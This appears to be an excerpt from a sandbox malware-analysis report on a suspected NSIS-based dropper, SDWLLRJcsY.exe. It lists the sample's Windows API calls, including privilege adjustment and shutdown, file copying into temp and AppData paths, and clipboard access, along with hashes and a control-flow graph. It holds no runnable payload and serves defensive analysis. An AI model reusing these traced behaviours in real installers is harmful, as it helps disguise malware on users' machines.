                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                      • ExitProcess.KERNEL32 ref: 004036D4
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                      • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\SDWLLRJcsY.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                      • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                      • ExitProcess.KERNEL32 ref: 0040387A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene$C:\Users\user\Desktop$C:\Users\user\Desktop\SDWLLRJcsY.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 2488574733-1526367878
                                      • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                      • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                      • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                      • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

                                      Control-flow Graph
                                      (• Executed / • Not Executed node colouring lost in extraction)
                                      Function entry: 4053ef. Edge list omitted; the graph covers GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, ShowWindow, CreateThread / CloseHandle, CreatePopupMenu / AppendMenuW / GetWindowRect / TrackPopupMenu, and OpenClipboard / EmptyClipboard / GlobalAlloc / GlobalLock / GlobalUnlock / SetClipboardData / CloseClipboard (see APIs below).
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                      • GetClientRect.USER32(?,?), ref: 00405499
                                      • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                      • ShowWindow.USER32(?,00000008), ref: 0040553C
                                      • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                        • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                      • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                      • ShowWindow.USER32(00000000), ref: 004055E8
                                      • ShowWindow.USER32(?,00000008), ref: 004055ED
                                      • ShowWindow.USER32(00000008), ref: 00405637
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                      • CreatePopupMenu.USER32 ref: 0040567C
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                      • GetWindowRect.USER32(?,?), ref: 004056B0
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                      • OpenClipboard.USER32(00000000), ref: 00405711
                                      • EmptyClipboard.USER32 ref: 00405717
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                      • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                      • CloseClipboard.USER32 ref: 00405772
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {$6B
                                      • API String ID: 590372296-3705917127
                                      • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                      • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                      • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                      • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

                                      Control-flow Graph
                                      (• Executed / • Not Executed node colouring lost in extraction)
                                      Function entry: 40595a. Edge list omitted; the graph covers DeleteFileW, lstrcatW, lstrlenW, FindFirstFileW / FindNextFileW / FindClose, and a recursive call back into 40595a at 405a5d (see APIs below).
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405983
                                      • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059CB
                                      • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059EE
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059F4
                                      • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A04
                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                      • FindClose.KERNEL32(00000000), ref: 00405AB3
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                      • "C:\Users\user\Desktop\SDWLLRJcsY.exe", xrefs: 0040595A
                                      • \*.*, xrefs: 004059C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-839970050
                                      • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                      • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                      • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                      • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                      • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                      • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 0040659A
                                      • FindClose.KERNEL32(00000000), ref: 004065A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: 8gB
                                      • API String ID: 2295610775-1733800166
                                      • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                      • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                      • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                      APIs
                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                      Strings
                                      • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene, xrefs: 004021BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene
                                      • API String ID: 542301482-2332916965
                                      • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                      • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                      • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                      • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                      • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                      • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                      • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A

                                      Control-flow Graph

                                      control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                      • ShowWindow.USER32(?), ref: 00403D61
                                      • DestroyWindow.USER32 ref: 00403D75
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                      • GetDlgItem.USER32(?,?), ref: 00403DB2
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                      • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                      • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                      • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                      • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                      • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                      • EnableWindow.USER32(?,?), ref: 00403FE4
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                      • EnableMenuItem.USER32(00000000), ref: 00404001
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                      • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                      • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                      • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: 6B
                                      • API String ID: 3282139019-4127139157
                                      • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                      • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                      • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                      • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D

                                      Control-flow Graph

